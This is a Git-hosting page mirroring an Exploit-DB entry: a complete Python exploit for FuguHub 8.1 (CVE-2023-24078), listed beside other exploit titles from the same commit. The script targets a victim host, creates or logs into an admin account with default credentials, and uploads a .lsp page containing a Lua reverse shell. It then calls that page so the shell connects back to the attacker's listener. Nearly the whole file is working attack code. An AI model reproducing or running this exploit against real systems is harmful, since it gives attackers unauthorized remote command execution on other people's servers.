bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/51550.py
Exploit-DB ef9b4e5962 DB: 2023-07-04 
20 changes to exploits/shellcodes/ghdb

TP-Link TL-WR940N V4 - Buffer OverFlow

D-Link DAP-1325 - Broken Access Control

Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)

FuguHub 8.1 - Remote Code Execution

GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)

PodcastGenerator 3.2.9 - Blind SSRF via XML Injection

POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

Rukovoditel 3.4.1 - Multiple Stored XSS

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

spip v4.1.10 - Spoofing Admin account

Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)

Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)

WBCE CMS 1.6.1 - Open Redirect & CSRF
WebsiteBaker v2.13.3 - Directory Traversal
WebsiteBaker v2.13.3 - Stored XSS

WP AutoComplete 1.0.4 - Unauthenticated SQLi
2023-07-04 00:16:26 +00:00

136 lines
No EOL
4.7 KiB
Python
Executable file
Raw Blame History

# Exploit Title: FuguHub 8.1 - Remote Code Execution
# Date: 6/24/2023
# Exploit Author: redfire359
# Vendor Homepage: https://fuguhub.com/
# Software Link: https://fuguhub.com/download.lsp
# Version: 8.1
# Tested on: Ubuntu 22.04.1
# CVE : CVE-2023-24078
import requests
from bs4 import BeautifulSoup
import hashlib
from random import randint
from urllib3 import encode_multipart_formdata
from urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
#Options for user registration, if no user has been created yet
username = 'admin'
password = 'password'
email = 'admin@admin.com'
parser = argparse.ArgumentParser()
parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)
parser.add_argument("-rp","--rport", help = "http port [Default 80]")
parser.add_argument("-l","--lhost", help = "Your IP", required = True)
parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)
args = parser.parse_args()
LHOST = args.lhost
LPORT = args.lport
url = args.rhost
if args.rport != None:
port = args.rport
else:
port = 80
def main():
checkAccount()
def checkAccount():
print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
s = requests.Session()
# Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account
r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp")
soup = BeautifulSoup(r.content, 'html.parser')
search = soup.find('h1')
if r.status_code == 404:
print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port")
exit(0)
userExists = False
userText = 'User database already saved'
for i in search:
if i.string == userText:
userExists = True
if userExists:
print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")
login(r,s)
else:
print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")
createUser(r,s)
login(r,s)
def createUser(r,s):
data = { email : email ,
'user' : username ,
'password' : password ,
'recoverpassword' : 'on' }
r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data)
print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")
def login(r,s):
print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")
data = {'ba_username' : username , 'ba_password' : password}
r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz
#Veryify login
login_Success_Title = 'Web-File-Server'
soup = BeautifulSoup(r.content, 'html.parser')
search = soup.find('title')
for i in search:
if i != login_Success_Title:
print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")
exit(0)
print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")
exploit(r,s)
def exploit(r,s):
#Find the file server, default is fs
r = s.get(f"https://{url}:443/fs/cmsdocs/")
code = r.status_code
if code == 404:
print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ")
exit(0)
print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")
#Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default
shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
file_content = f'''
<h2> Check ur nc listener on the port you put in <h2>
<?lsp if request:method() == "GET" then ?>
<?lsp
{shell}
?>
<?lsp else ?>
Wrong request method, goodBye!
<?lsp end ?>
'''
files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files)
if r.text == 'ok' :
print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")
r = s.get(f"https://{url}:443/rev.lsp")
if __name__=='__main__':
try:
main()
except:
print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")
Reference in a new issue View git blame Copy permalink